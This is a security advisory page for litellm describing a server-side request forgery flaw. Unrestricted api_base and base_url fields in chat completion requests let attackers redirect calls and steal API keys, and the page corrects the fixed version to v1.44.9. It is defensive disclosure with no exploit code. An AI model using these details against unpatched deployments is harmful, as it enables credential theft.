Safety vulnerability ID: 73303
The information on this page was manually curated by our Cybersecurity Intelligence Team.
Affected versions of the litellm package are vulnerable to Server-Side Request Forgery (SSRF) attacks due to insufficient validation of request body parameters. The api_base and base_url fields in POST /chat/completions requests are not properly restricted, allowing attackers to redirect server-side API calls to attacker-controlled domains.
This vulnerability permits malicious users to exfiltrate sensitive data—including OpenAI API keys—by proxying requests through untrusted endpoints. Exploitation may result in unauthorized access to third-party services, data leakage, or misuse of exposed secrets.
**Advisory Correction Notice:**
The original advisory states that this vulnerability was fixed in version v1.44.8. However, following a thorough analysis, Safety’s Cyber Research team has confirmed that a fix for this vulnerability is actually available in versions v1.44.9 and onwards. The fix was introduced in the following [commit](https://github.com/BerriAI/litellm/commit/ba1912afd1b19e38d3704bb156adf887f91ae1e0). This corrects the version information implied by the original advisory.
Latest version: 1.77.4
Library to easily interface with LLM API providers
This vulnerability has no description
Scan your Python project for dependency vulnerabilities in two minutes
Scan your application